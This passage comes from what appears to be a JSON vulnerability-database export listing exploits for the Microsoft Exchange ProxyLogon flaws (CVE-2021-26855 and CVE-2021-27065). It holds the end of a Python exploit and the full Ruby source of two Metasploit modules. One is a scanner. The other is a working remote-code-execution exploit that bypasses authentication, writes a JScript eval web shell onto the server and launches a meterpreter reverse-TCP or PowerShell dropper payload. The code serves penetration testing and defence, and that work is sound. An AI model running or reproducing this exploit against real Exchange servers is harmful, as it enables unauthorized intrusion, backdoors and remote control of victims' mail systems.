checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\n\n print(\"[!!!] FINISHED OhhWAA\")\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:37:41", "description": "This module scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065). As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server. 
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T13:37:20", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/exchange_proxylogon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon 
Scanner',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check.', 'POST', ['GET', 'POST']])\n ])\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def run_host(target_host)\n @proto = (ssl ? 
'https' : 'http')\n\n uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n received = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => uri,\n 'cookie' => 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'\n })\n unless received\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if received && (received.code != 500 && received.code != 503)\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error(\"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if received.headers['X-CalculatedBETarget'] != 'localhost'\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error('Could\\'t obtain a correct \\'X-CalculatedBETarget\\' in the response header.')\n\n return Exploit::CheckCode::Safe\n end\n\n print_good(message('The target is vulnerable to CVE-2021-26855.'))\n msg = \"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/exchange_proxylogon.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:42", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. 
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T23:49:45", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-11-10T00:12:38", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include 
Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll', # https://twitter.com/lotusdll/status/1371465073525362691\n 'Praetorian' # # Vulnerability analysis + PoC\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/praetorian-inc/proxylogon-exploit'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => 
'2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n 
OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', Rex::UserAgent.session_agent])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n 
\"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? 
|| legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n [server, legacy_dn]\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n 
\"[:[@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.split('.')[0].downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication 
SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status(message('Retrieving backend FQDN over RPC request'))\n server_name = request_fqdn\n print_status(\"Internal server name (#{server_name})\")\n end\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Preparing the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Writing the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning('Waiting for the payload to be available')\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t 
access the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? 
|| oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, auth_session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = 
\"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 
'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxylogon_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:39", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). 
